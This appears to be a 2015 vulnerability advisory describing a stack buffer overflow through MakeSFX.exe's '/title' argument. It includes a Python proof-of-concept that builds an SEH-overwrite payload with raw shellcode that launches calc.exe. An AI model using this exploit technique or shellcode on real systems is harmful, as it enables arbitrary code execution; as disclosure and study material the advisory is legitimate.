MakeSFX.exe 1.44 Stack Buffer Overflow

`[+] Credits: John Page aka hyp3rlinx  
  
[+] Website: hyp3rlinx.altervista.org  
  
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-MAKESFX-BUFF-OVERFLOW-09302015.txt  
  
  
  
Vendor:  
================================  
freeextractor.sourceforge.net/FreeExtractor  
freeextractor.sourceforge.net/FreeExtractor/MakeSFX.exe  
  
  
Vulnerable Product:  
==================================================  
MakeSFX.exe v1.44   
Mar 19 2001 & Dec 10 2009 versions  
  
  
  
Vulnerability Type:  
============================  
Stack Based Buffer Overflow  
  
  
  
CVE Reference:  
==============  
N/A  
  
  
  
Vulnerability Details:  
=========================  
Converts a zip file into a 32-bit GUI Windows self-extractor.  
  
Example usage:  
  
makesfx.exe /zip="source.zip" /sfx="output.exe" [/title="Your Title"]  
[/website="http://www.example.com"] [/intro="This is a test self extractor"]  
[/defaultpath="$desktop$\My Files"] [/autoextract] [/openexplorerwindow]  
[/shortcut="$desktop$\Program Shortcut.lnk|$targetdir$\Program.exe]  
[/delete] [/icon="MyIcon.ico"] [/overwrite] [/?]  
  
etc...  
  
The '/title' argument when supplied an overly long payload will overwrite NSEH & SEH exception handlers  
causing buffer overflow, we can then execute our aribitrary shellcode. I have seen some applications using  
MakeSFX.exe from .bat files for some automation purposes, if the local .bat file is replaced by malicious  
one attackers can cause mayhem on the system.  
  
Both versions from 2001 & 2009 are vulnerable but exploit setup will be off by 80 bytes.  
punksnotdead="/title"+"A"*1078+"BBBB"+"RRRR" #<---- SEH Handler control MakeSFX v1.44 (Dec 10 2009)  
punksnotdead="/title"+"A"*1158+"BBBB"+"RRRR" #<---- SEH Handler control MakeSFX v1.44 (Mar 19 2001)  
  
  
POC exploit code(s):  
====================  
  
We will exploit MakeSFX v1.44 (Mar 19 2001).  
  
I find one POP,POP,RET instruction in MakeSFX.exe with ASLR, SafeSEH, Rebase all set to False, but it contains null 0x00.  
So no suitable SEH instruction address avail, I will instead have to use mona.py to look for POP,POP,RET instruction  
in outside modules and we find some...  
  
e.g.  
  
0x77319529 : pop esi # pop edi # ret | {PAGE_READONLY}  
  
  
Python script to exploitz!  
==========================  
  
import struct,os,subprocess  
  
#MakeSFX v1.44 (Mar 19 2001)  
pgm="C:\\hyp3rlinx\\MakeSFX.exe "  
  
#shellcode to pop calc.exe  
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"  
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"  
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"  
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"  
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"  
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"  
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")  
  
#punksnotdead="A"*1158+"RRRR"+"BBBB" #<--- KABOOOOOOM!  
  
nseh="\xEB\x06"+"\x90"*2  
seh=struct.pack('<L', 0x76F29529)  
  
punksnotdead="/title"+"A"*1158 + nseh + seh + sc + "\x90"*10   
subprocess.Popen([pgm, punksnotdead], shell=False)  
  
  
  
Disclosure Timeline:  
=========================================================  
Vendor Notification: NA  
Sept 30, 2015 : Public Disclosure  
  
  
  
Exploitation Technique:  
=======================  
Local  
Tested successfully on Windows SP1  
DisableExceptionChainValidation in registry set to '1'  
value of 1 disables the registry entry that prevents SEH overwrites.  
  
  
===========================================================  
  
[+] Disclaimer  
Permission is hereby granted for the redistribution of this advisory,  
provided that it is not altered except by reformatting it, and that due  
credit is given. Permission is explicitly given for insertion in  
vulnerability databases and similar, provided that due credit is given to  
the author. The author is not responsible for any misuse of the information contained  
herein and prohibits any malicious use of all security related information  
or exploits by the author or elsewhere.  
  
by hyp3rlinx  
  
`